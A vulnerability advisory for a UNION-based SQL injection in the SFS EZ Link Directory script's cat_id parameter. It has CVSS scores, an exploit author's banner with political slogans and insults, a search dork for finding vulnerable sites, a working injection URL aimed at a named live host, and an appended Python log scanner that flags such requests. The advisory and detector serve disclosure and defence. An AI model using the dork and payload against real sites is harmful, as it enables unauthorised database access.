SFS EZ Link Directory (cat_id) Remote SQL Injection Vulnerability

2009.05.15
Credit: BeyazKurt
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
# We condemn the Hague court. FUCK THE JUSTICE!
# Hack = Empty W0rk ..
#
# Script : SFS Link Directory
# Price: $ 24.95
# Script Site: http://scripts-for-sites.com/item.php?item=117
#
# D0rk : "get lost, don't you have anything better to do xD"
# just kidding xD there are plenty of sites : inurl:"links.php?ax=list"
#
# SQL Injection Vuln. :
#
# Exploit : SITE.COM/[path]/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# Example: http://link.scripts-for-sites.com/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# -------------------------------
# Ya RAMADHAN
# INDEPENDENT KOSOVA (H) - Ethnic ALBANIA (H)
# pigs for dedication : We Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
# Proud 2 Be ALBANIAN !
#
# Screw all the emos, punks and the rest of them! Anti-Tikky.Com we are anti-preppy xD
#
# IMPORTANT note: do not buy hosting from Expo Bilisim. The scoundrels do not even know how to manage a server and on top of that they try to fool the customer. I will publish it soon on r10 with proof ;)
# I told you I would disgrace you ;)
#
#######################################################

References:

http://www.securityfocus.com/bid/32034
http://www.milw0rm.com/exploits/6908
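
The following Python log check is an added example, not part of the original advisory or the vendor's code: it flags requests to links.php whose cat_id is not a plain integer, which covers the UNION-based request quoted in the advisory. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [15/May/2009:10:01:02 +0000] "GET /links.php?ax=list&sub=1&cat_id=4 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [15/May/2009:10:01:09 +0000] "GET /links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* HTTP/1.1" 200 4876',
    '198.51.100.9 - - [15/May/2009:10:01:15 +0000] "GET /dir/links.php?ax=list&sub=1&cat_id=1%20UNION%20SELECT%200,1,2,3-- HTTP/1.1" 200 4876',
    '198.51.100.23 - - [15/May/2009:10:01:40 +0000] "GET /links.php?ax=list&cat_id=7%2527 HTTP/1.1" 200 312',
    '203.0.113.5 - - [15/May/2009:10:02:00 +0000] "GET /index.php?cat_id=abc HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(?:union|select)\b|/\*|--|'|\b(?:version|database)\s*\(", re.I)


def classify_cat_id(value):
    """Return 'ok', 'sqli' or 'invalid' for one already URL-decoded cat_id value."""
    value = unquote_plus(value)  # second decode pass catches double encoding
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    return "sqli" if SQL_TOKENS.search(value) else "invalid"


def scan(lines):
    """Return (client, verdict, decoded cat_id) for each suspicious links.php request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/links.php"):
            continue  # only the script named in the advisory is checked
        # keep_blank_values so an empty cat_id is reported instead of silently dropped
        for value in parse_qs(url.query, keep_blank_values=True).get("cat_id", []):
            verdict = classify_cat_id(value)
            if verdict != "ok":
                findings.append((client, verdict, unquote_plus(value)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule applies on the server side: a cat_id that fails the `\d{1,10}` check should be rejected before it reaches any query.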


Copyright 2025, cxsecurity.com